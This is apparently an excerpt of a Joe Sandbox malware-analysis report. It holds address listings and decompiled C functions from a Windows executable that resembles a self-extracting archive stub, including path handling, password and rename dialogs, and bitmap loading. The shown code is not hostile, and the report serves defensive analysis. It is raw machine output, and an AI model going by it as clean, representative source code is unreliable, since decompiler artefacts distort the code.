                0x003ecc0a
                0x003ecc12
                0x003ecc18
                0x003ecc25
                0x003ecc2c
                0x003ecc3c
                0x003ecc46
                0x003ecc54
                0x003ecc5a
                0x003ecc62
                0x003ecc67
                0x003ecc68
                0x003ecc69
                0x003ecc6b
                0x003ecc7f
                0x003ecc7f
                0x00000000
                0x003ecc6b
                0x003ecb01
                0x003ecb01
                0x003ecb04
                0x003ecb11
                0x003ecb11
                0x003ecb14
                0x003ecb16
                0x003ecb17
                0x003ecb19
                0x003ecb1a
                0x003ecb1f
                0x003ecb24
                0x003ecb2a
                0x003ecb2c
                0x003ecb2e
                0x003ecb31
                0x003ecb38
                0x003ecb39
                0x003ecb3f
                0x003ecb40
                0x003ecb43
                0x003ecb44
                0x003ecb45
                0x003ecb4a
                0x003ecb4d
                0x003ecb53
                0x003ecb5c
                0x003ecb5f
                0x003ecb64
                0x003ecb66
                0x003ecb68
                0x003ecb6a
                0x003ecb6a
                0x003ecb6c
                0x003ecb6c
                0x003ecb6e
                0x003ecb6e
                0x003ecb76
                0x003ecb7d
                0x003ecb7f
                0x003ecb86
                0x003ecb8c
                0x003ecb8e
                0x003ecb8f
                0x003ecb97
                0x003ecba6
                0x003ecba6
                0x003ecb97
                0x003ecbb1
                0x003ecbb3
                0x003ecbc2
                0x003ecbc8
                0x003ecbce
                0x003ecbd9
                0x003ecbd9
                0x00000000
                0x003ecbce
                0x003ecb06
                0x003ecb06
                0x003ecb0b
                0x00000000
                0x00000000
                0x00000000
                0x003ecb0b
                0x003ecad1
                0x003ecad1
                0x003ecad5
                0x00000000
                0x00000000
                0x003ecad7
                0x003ecad7
                0x003ecada
                0x003ecadc
                0x003ecadf
                0x00000000
                0x00000000
                0x003ecae5
                0x003ecaee
                0x00000000
                0x003ecaee
                0x00000000
                0x003ecc8a
                0x003ecc8a
                0x003ecc8b
                0x003ecc90
                0x003ecc92
                0x003ecc95
                0x003ecc95
                0x00000000
                0x003ecccb
                0x003ecccb
                0x003eccd2
                0x003eccd4
                0x003eccd4
                0x003eccd6
                0x003ecd05
                0x003ecd05
                0x003ecd0b
                0x00000000
                0x003ecd0b
                0x003eccd8
                0x003eccd8
                0x003eccd8
                0x003eccdb
                0x003eccf4
                0x003eccf4
                0x003eccfa
                0x003eccfa
                0x00000000
                0x003eccfa
                0x003eccdd
                0x003eccdd
                0x003eccdd
                0x003ecce0
                0x00000000
                0x00000000
                0x003ecce2
                0x003ecce2
                0x003ecce2
                0x003ecce5
                0x00000000
                0x00000000
                0x003ecceb
                0x003ecceb
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ece87
                0x003ece87
                0x003ece8a
                0x003ed009
                0x003ed009
                0x003ed00c
                0x003ed012
                0x003ed018
                0x003ed01a
                0x003ed01a
                0x003ed024
                0x003ed024
                0x00000000
                0x003ed00c
                0x003ece90
                0x003ece90
                0x003ece96
                0x003ecea4
                0x003eceab
                0x003eceb0
                0x003eceb2
                0x003eceb4
                0x003eceb9
                0x003eceb9
                0x003eceb9
                0x003eced1
                0x003ecede
                0x003ecee3
                0x003ecee5
                0x00000000
                0x00000000
                0x003eceb7
                0x003eceb7
                0x003eceb7
                0x003eceb8
                0x003eceb8
                0x003ecee7
                0x003ecef1
                0x003ecef7
                0x003ecefe
                0x00000000
                0x00000000
                0x003ecf04
                0x003ecf04
                0x003ecf0a
                0x00000000
                0x00000000
                0x003ecf10
                0x003ecf10
                0x003ecf12
                0x003ecf19
                0x003ecf1f
                0x003ecf21
                0x003ecf22
                0x003ecf27
                0x003ecf28
                0x003ecf29
                0x003ecf2b
                0x003ecf7b
                0x003ecf7b
                0x003ecf82
                0x003ecf90
                0x003ecfa1
                0x003ecfaf
                0x003ecfaf
                0x003ecfbb
                0x003ecfc0
                0x003ecfc2
                0x003ecfd2
                0x003ecfdc
                0x003ecfe1
                0x003ecfe4
                0x003ecfef
                0x003ecff1
                0x003ecff8
                0x003ecffe
                0x003ecffe
                0x00000000
                0x003ecfe4
                0x003ecf2d
                0x003ecf2d
                0x003ecf34
                0x003ecf36
                0x003ecf39
                0x00000000
                0x00000000
                0x003ecf3b
                0x003ecf3b
                0x003ecf3e
                0x003ecf3e
                0x003ecf3e
                0x003ecf42
                0x00000000
                0x00000000
                0x003ecf44
                0x003ecf44
                0x003ecf4c
                0x003ecf4d
                0x003ecf4f
                0x003ecf52
                0x00000000
                0x00000000
                0x003ecf54
                0x00000000
                0x003ecf54
                0x003ecf56
                0x003ecf61
                0x003ecf6c
                0x003ecf71
                0x003ecf71
                0x003ecf73
                0x00000000
                0x00000000
                0x003ed030
                0x003ed030
                0x003ed033
                0x003ed035
                0x003ed03c
                0x003ed03e
                0x003ed044
                0x003ed045
                0x003ed04a
                0x003ed04b
                0x003ed04b
                0x003ed050
                0x003ed053
                0x003ed059
                0x003ed059
                0x003ed05e
                0x00000000
                0x00000000
                0x003ed06a
                0x003ed06a
                0x003ed06d
                0x00000000
                0x00000000
                0x003ed073
                0x003ed073
                0x003ed075
                0x003ed07c
                0x003ed084
                0x003ed08a
                0x003ed08d
                0x003ed0b0
                0x003ed0b7
                0x003ed08f
                0x003ed08f
                0x003ed092
                0x003ed0a2
                0x003ed0a9
                0x003ed094
                0x003ed094
                0x003ed09b
                0x003ed09b
                0x003ed092
                0x003ed0bc
                0x003ed0ca
                0x003ed0cf
                0x003ed0d1
                0x003ed0d8
                0x003ed0e7
                0x003ed0ee
                0x003ed0f3
                0x003ed0f5
                0x003ed0f6
                0x003ed0fd
                0x003ed149
                0x003ed150
                0x003ed155
                0x003ed157
                0x00000000
                0x00000000
                0x003ed15d
                0x003ed15d
                0x003ed164
                0x003ed16a
                0x003ed16c
                0x003ed16f
                0x003ed221
                0x003ed221
                0x00000000
                0x003ed221
                0x003ed175
                0x003ed175
                0x003ed178
                0x003ed178
                0x003ed178
                0x003ed17a
                0x003ed17b
                0x003ed17e
                0x003ed188
                0x003ed188
                0x003ed18a
                0x003ed194
                0x003ed199
                0x003ed19b
                0x003ed1fd
                0x003ed1fd
                0x00000000
                0x003ed1fd
                0x003ed19d
                0x003ed1a4
                0x003ed1aa
                0x003ed1af
                0x003ed1b1
                0x00000000
                0x00000000
                0x003ed1b3
                0x003ed1b3
                0x003ed1b5
                0x003ed1b6
                0x003ed1b9
                0x003ed1bb
                0x003ed1be
                0x003ed1d4
                0x003ed1d4
                0x003ed1d6
                0x003ed1d8
                0x003ed1de
                0x003ed1de
                0x003ed1de
                0x003ed1e1
                0x00000000
                0x00000000
                0x003ed1db
                0x003ed1db
                0x003ed1db
                0x003ed1db
                0x003ed1e3
                0x003ed1e3
                0x003ed1e9
                0x003ed1eb
                0x003ed1f0
                0x003ed1f3
                0x003ed1f8
                0x00000000
                0x003ed1f8
                0x003ed1c0
                0x003ed1c0
                0x003ed1c7
                0x003ed1cc
                0x00000000
                0x003ed1cc
                0x003ed180
                0x003ed180
                0x003ed182
                0x003ed183
                0x003ed186
                0x00000000
                0x00000000
                0x00000000
                0x003ed200
                0x003ed200
                0x003ed203
                0x003ed206
                0x003ed208
                0x003ed208
                0x003ed211
                0x003ed216
                0x003ed218
                0x003ed21a
                0x003ed21c
                0x003ed21c
                0x00000000
                0x003ed0ff
                0x003ed0ff
                0x003ed107
                0x003ed113
                0x003ed119
                0x003ed11a
                0x003ed11b
                0x003ed120
                0x003ed121
                0x003ed122
                0x003ed124
                0x003ed12a
                0x003ed12c
                0x003ed13f
                0x003ed13f
                0x003ed226
                0x003ed226
                0x003ed22e
                0x003ed238
                0x003ed23f
                0x003ed23f
                0x003ed24c
                0x003ed253
                0x003ed258
                0x003ed260
                0x003ed26c
                0x003ed26c
                0x003ed279
                0x003ed27e
                0x003ed286
                0x003ed290
                0x003ed29d
                0x003ed2a4
                0x003ed2a4
                0x003ed2b1
                0x003ed2b8
                0x003ed2bd
                0x003ed2c5
                0x003ed2cb
                0x003ed2cd
                0x003ed2cd
                0x003ed2e2
                0x003ed2e7
                0x003ed2f3
                0x003ed2f5
                0x003ed306
                0x003ed313
                0x00000000
                0x003ed2f7
                0x003ed2f7
                0x003ed302
                0x003ed304
                0x003ed318
                0x003ed318
                0x003ed324
                0x003ed331
                0x003ed33d
                0x003ed344
                0x003ed349
                0x003ed350
                0x003ed356
                0x003ed35d
                0x003ed363
                0x003ed36a
                0x003ed36c
                0x003ed36e
                0x003ed370
                0x003ed372
                0x003ed378
                0x003ed37a
                0x003ed37c
                0x003ed37e
                0x003ed384
                0x003ed386
                0x003ed390
                0x003ed393
                0x003ed399
                0x003ed3a8
                0x003ed3ad
                0x003ed3b4
                0x003ed3b6
                0x003ed3b7
                0x003ed3bd
                0x003ed3be
                0x003ed3c0
                0x003ed3c5
                0x003ed3c5
                0x00000000
                0x003ed3b4
                0x00000000
                0x003ed304
                0x003ed2f5
                0x00000000
                0x003ed3cd
                0x003ed3cd
                0x003ed3d0
                0x003ed3d2
                0x003ed3d2
                0x00000000
                0x00000000
                0x003ecd17
                0x003ecd17
                0x003ecd1f
                0x003ecd25
                0x003ecd28
                0x003ecd4c
                0x003ecd2a
                0x003ecd2a
                0x003ecd2d
                0x003ecd40
                0x003ecd2f
                0x003ecd2f
                0x003ecd31
                0x003ecd36
                0x003ecd36
                0x003ecd2d
                0x00000000
                0x00000000
                0x003ece5d
                0x003ece5d
                0x003ece5e
                0x003ece63
                0x003ece63
                0x003ece63
                0x003ece66
                0x003ece6b
                0x003ece71
                0x003ece71
                0x003ece7d
                0x003ece7d
                0x00000000
                0x00000000
                0x003ec7a2
                0x003ec7a2
                0x003ec7a7
                0x003ec7a8
                0x003ec7a9
                0x003ec7ae
                0x003ec7b4
                0x003ec7b7
                0x00000000
                0x003ec7b9
                0x003ec7b9
                0x00000000
                0x003ec7b9
                0x003ec7b7
                0x003ed40a
                0x003ed410
                0x003ed418
                0x003ed418
                0x003ece42
                0x003ece45
                0x00000000
                0x00000000
                0x003ece4b
                0x003ece4d
                0x003ece4e
                0x003ece4e
                0x003ece4f
                0x003ece50
                0x003ece53
                0x00000000
                0x003ece53
                0x003ece2b
                0x003ece2e
                0x00000000
                0x00000000
                0x003ece34
                0x003ece34
                0x00000000
                0x003ece34

                APIs
                • _wcschr.LIBVCRUNTIME ref: 003ECD84
                  • Part of subcall function 003EAF98: _wcschr.LIBVCRUNTIME ref: 003EB033
                  • Part of subcall function 003E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,003DC116,00000000,.exe,?,?,00000800,?,?,?,003E8E3C), ref: 003E1FD1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcschr$CompareString
                • String ID: <$HIDE$MAX$MIN
                • API String ID: 69343711-3358265660
                • Opcode ID: 7b394a923ea77fc2f38090eea43dc70e2119ce39163eefd0363502e4043f5f4d
                • Instruction ID: 4cbfbc9b058ceda7bc41f9c059216f2b37ff3783dbf0d0784add5be646235873
                • Opcode Fuzzy Hash: 7b394a923ea77fc2f38090eea43dc70e2119ce39163eefd0363502e4043f5f4d
                • Instruction Fuzzy Hash: 803185759002A9AADF26CB56DC41EEF73BCEB54350F414366E901E71C0EBB09E858FA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DB991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E003DB991(void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				short _t13;
				signed int _t14;
				short* _t19;
				signed int _t20;
				void* _t22;
				signed short* _t26;
				signed int _t28;
				signed int _t30;

				_t19 = _a8;
				_t26 = _a4;
				 *_t19 = 0;
				_t10 = E003DBC98(__eflags, _t26);
				_t20 =  *_t26 & 0x0000ffff;
				if(_t10 != 0) {
					return E003D4092(_t19, _a12, L"%c:\\", _t20);
				}
				_t28 = 0x5c;
				__eflags = _t20 - _t28;
				if(_t20 == _t28) {
					__eflags = _t26[1] - _t28;
					if(_t26[1] == _t28) {
						_push(_t28);
						_push( &(_t26[2]));
						_t10 = E003F22C6(_t20);
						_pop(_t22);
						__eflags = _t10;
						if(_t10 != 0) {
							_push(_t28);
							_push(_t10 + 2);
							_t13 = E003F22C6(_t22);
							__eflags = _t13;
							if(_t13 == 0) {
								_t14 = E003F3E13(_t26);
							} else {
								_t14 = (_t13 - _t26 >> 1) + 1;
							}
							__eflags = _t14 - _a12;
							asm("sbb esi, esi");
							_t30 = _t28 & _t14;
							E003F60C2(_t19, _t26, _t30);
							_t10 = 0;
							__eflags = 0;
							 *((short*)(_t19 + _t30 * 2)) = 0;
						}
					}
				}
				return _t10;
			}












                0x003db992
                0x003db999
                0x003db99e
                0x003db9a1
                0x003db9a6
                0x003db9ab
                0x00000000
                0x003db9bd
                0x003db9c5
                0x003db9c6
                0x003db9c9
                0x003db9cb
                0x003db9cf
                0x003db9d4
                0x003db9d5
                0x003db9d6
                0x003db9dc
                0x003db9dd
                0x003db9df
                0x003db9e4
                0x003db9e5
                0x003db9e6
                0x003db9ed
                0x003db9ef
                0x003db9f9
                0x003db9f1
                0x003db9f5
                0x003db9f5
                0x003db9ff
                0x003dba03
                0x003dba05
                0x003dba0a
                0x003dba12
                0x003dba12
                0x003dba14
                0x003dba14
                0x003db9df
                0x003db9cf
                0x00000000

                APIs
                • _swprintf.LIBCMT ref: 003DB9B8
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                • _wcschr.LIBVCRUNTIME ref: 003DB9D6
                • _wcschr.LIBVCRUNTIME ref: 003DB9E6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcschr$__vswprintf_c_l_swprintf
                • String ID: %c:\
                • API String ID: 525462905-3142399695
                • Opcode ID: af20c860664a4390912866fbdce0b1447bec2cb5eab102145fe37a503696458f
                • Instruction ID: cf6e2050fb53f201efa5f8b6a41e90ad4e286a2a8c38068f21aece138c74a159
                • Opcode Fuzzy Hash: af20c860664a4390912866fbdce0b1447bec2cb5eab102145fe37a503696458f
                • Instruction Fuzzy Hash: 3C01F563504312F9DA326B35AC42D7BE7ACEF957B0B56481BF644DB282EB30D84482B1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EB270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                Download Yara Rule
                C-Code - Quality: 83%
                			E003EB270(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E003D1316(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E003DF3FA(_t24, 0x427a78,  &_v260);
					E003DF445( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                0x003eb27a
                0x003eb27e
                0x003eb282
                0x003eb29b
                0x003eb30a
                0x00000000
                0x003eb30c
                0x003eb29d
                0x003eb2a3
                0x003eb304
                0x00000000
                0x003eb304
                0x003eb2a8
                0x003eb2b7
                0x00000000
                0x003eb2b7
                0x003eb2ad
                0x003eb2b0
                0x003eb2d6
                0x003eb2e8
                0x003eb2f5
                0x003eb2fa
                0x003eb2bd
                0x003eb2be
                0x00000000
                0x003eb2be
                0x003eb2b5
                0x003eb2bb
                0x00000000
                0x003eb2bb
                0x00000000

                APIs
                  • Part of subcall function 003D1316: GetDlgItem.USER32(00000000,00003021), ref: 003D135A
                  • Part of subcall function 003D1316: SetWindowTextW.USER32(00000000,004035F4), ref: 003D1370
                • EndDialog.USER32(?,00000001), ref: 003EB2BE
                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 003EB2D6
                • SetDlgItemTextW.USER32(?,00000067,?), ref: 003EB304
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: GETPASSWORD1$xzB
                • API String ID: 445417207-2334712647
                • Opcode ID: a840aa337a2d2765ca7715081fd68b1b15ce868077c336b04f709909f5ae50ad
                • Instruction ID: 7b079ac68ea01cc504106e77572ca5508c57304c53a3714b05de5ac829c73d89
                • Opcode Fuzzy Hash: a840aa337a2d2765ca7715081fd68b1b15ce868077c336b04f709909f5ae50ad
                • Instruction Fuzzy Hash: EE11E132900168BADB239E65AC8AFFFB77CEF09701F100521FB45B61C0C7A59A4487A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E003EB6DD(void* __ecx, void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t15;
				signed int _t18;
				signed int _t19;
				void* _t21;
				void* _t22;
				void* _t26;
				void* _t33;

				_t33 = __fp0;
				_t21 = __edx;
				_t8 = LoadBitmapW( *0x411028, 0x65);
				_t22 = _t8;
				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
				if(_t22 != 0) {
					L2:
					GetObjectW(_t22, 0x18,  &_v28);
					L4:
					_t11 = E003EA5C6(_t29);
					if(_t11 != 0) {
						if(_t19 != 0) {
							_push(0x66);
							"QQVWhdG@"();
							_t26 = _t11;
							if(_t26 != 0) {
								DeleteObject(_t22);
								_t22 = _t26;
							}
						}
						_t13 = E003EA605(_v20);
						_t15 = E003EA80C(_t21, _t33, _t22, E003EA5E4(_v24), _t13);
						DeleteObject(_t22);
						_t22 = _t15;
					}
					return _t22;
				}
				_push(0x65);
				"QQVWhdG@"();
				_t22 = _t8;
				_t29 = _t22;
				if(_t22 == 0) {
					_v24 = 0x5d;
					_v20 = 0x12e;
					goto L4;
				}
				goto L2;
			}
















                0x003eb6dd
                0x003eb6dd
                0x003eb6ed
                0x003eb6f3
                0x003eb6f7
                0x003eb6fc
                0x003eb70b
                0x003eb712
                0x003eb728
                0x003eb728
                0x003eb72f
                0x003eb734
                0x003eb736
                0x003eb738
                0x003eb73d
                0x003eb741
                0x003eb744
                0x003eb74a
                0x003eb74a
                0x003eb741
                0x003eb74f
                0x003eb75f
                0x003eb767
                0x003eb76d
                0x003eb76f
                0x003eb775
                0x003eb775
                0x003eb6fe
                0x003eb700
                0x003eb705
                0x003eb707
                0x003eb709
                0x003eb71a
                0x003eb721
                0x00000000
                0x003eb721
                0x00000000

                APIs
                • LoadBitmapW.USER32(00000065), ref: 003EB6ED
                • GetObjectW.GDI32(00000000,00000018,?), ref: 003EB712
                • DeleteObject.GDI32(00000000), ref: 003EB744
                • DeleteObject.GDI32(00000000), ref: 003EB767
                  • Part of subcall function 003EA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,003EB73D,00000066), ref: 003EA6D5
                  • Part of subcall function 003EA6C2: SizeofResource.KERNEL32(00000000,?,?,?,003EB73D,00000066), ref: 003EA6EC
                  • Part of subcall function 003EA6C2: LoadResource.KERNEL32(00000000,?,?,?,003EB73D,00000066), ref: 003EA703
                  • Part of subcall function 003EA6C2: LockResource.KERNEL32(00000000,?,?,?,003EB73D,00000066), ref: 003EA712
                  • Part of subcall function 003EA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,003EB73D,00000066), ref: 003EA72D
                  • Part of subcall function 003EA6C2: GlobalLock.KERNEL32 ref: 003EA73E
                  • Part of subcall function 003EA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 003EA7A7
                  • Part of subcall function 003EA6C2: GlobalUnlock.KERNEL32(00000000), ref: 003EA7C6
                  • Part of subcall function 003EA6C2: GlobalFree.KERNEL32 ref: 003EA7CD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                • String ID: ]
                • API String ID: 1428510222-3352871620
                • Opcode ID: c995dc67589ecbeb4ce0c4fd19a508cbb0560bfbda8f9ced41150bc3495be296
                • Instruction ID: 9e571293d1a81e2ef125175522109750ab859298ed048e3fbd5e6bab00a2b21f
                • Opcode Fuzzy Hash: c995dc67589ecbeb4ce0c4fd19a508cbb0560bfbda8f9ced41150bc3495be296
                • Instruction Fuzzy Hash: 1501453290067167D7137B768C49ABFBAB99FC2B53F090220F940AB2D5DF31CD0946A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003ED600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                Download Yara Rule
                C-Code - Quality: 83%
                			E003ED600(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				intOrPtr _t18;
				void* _t19;
				struct HWND__* _t21;
				signed short _t22;

				_t16 = _a16;
				_t22 = _a12;
				_t21 = _a4;
				_t18 = _a8;
				if(E003D1316(_t17, _t21, _t18, _t22, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t19 = _t18 - 0x110;
				if(_t19 == 0) {
					 *0x42fcb4 = _t16;
					SetDlgItemTextW(_t21, 0x66, _t16);
					SetDlgItemTextW(_t21, 0x68,  *0x42fcb4);
					goto L10;
				}
				if(_t19 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t22 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t21, 0x68,  *0x42fcb4, 0x800);
					_push(1);
					L7:
					EndDialog(_t21, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                0x003ed601
                0x003ed606
                0x003ed60b
                0x003ed610
                0x003ed628
                0x003ed68a
                0x00000000
                0x003ed68c
                0x003ed62a
                0x003ed630
                0x003ed66f
                0x003ed675
                0x003ed684
                0x00000000
                0x003ed684
                0x003ed635
                0x003ed644
                0x00000000
                0x003ed644
                0x003ed63a
                0x003ed63d
                0x003ed661
                0x003ed667
                0x003ed64a
                0x003ed64b
                0x00000000
                0x003ed64b
                0x003ed642
                0x003ed648
                0x00000000
                0x003ed648
                0x00000000

                APIs
                  • Part of subcall function 003D1316: GetDlgItem.USER32(00000000,00003021), ref: 003D135A
                  • Part of subcall function 003D1316: SetWindowTextW.USER32(00000000,004035F4), ref: 003D1370
                • EndDialog.USER32(?,00000001), ref: 003ED64B
                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 003ED661
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 003ED675
                • SetDlgItemTextW.USER32(?,00000068), ref: 003ED684
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: RENAMEDLG
                • API String ID: 445417207-3299779563
                • Opcode ID: 77f4297ec264729a5d6ae02f7e5bb03fe892b2104ebab5fab179f320288fe88e
                • Instruction ID: f5dbc3ccb29fea1c39e47662957479b19c74c8764a4352641a41ff7854e07800
                • Opcode Fuzzy Hash: 77f4297ec264729a5d6ae02f7e5bb03fe892b2104ebab5fab179f320288fe88e
                • Instruction Fuzzy Hash: 3401F9332442647AD2224F669E09F57776DFB5A702F910531F205A50D0C6A19905876D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,003F7E24,?,?,003F7DC4,?,0040C300,0000000C,003F7F1B,?,00000002), ref: 003F7E93
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003F7EA6
                • FreeLibrary.KERNEL32(00000000,?,?,?,003F7E24,?,?,003F7DC4,?,0040C300,0000000C,003F7F1B,?,00000002,00000000), ref: 003F7EC9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 5a1a70117a23906d00f5a03b02c8a1449a1da3849203c5b4802a5bb2c884ce55
                • Instruction ID: 76cd996b37d2d29ea6a5a44b0c002a322c692a1bdc6f9c03d865d9c6b0d1a2dd
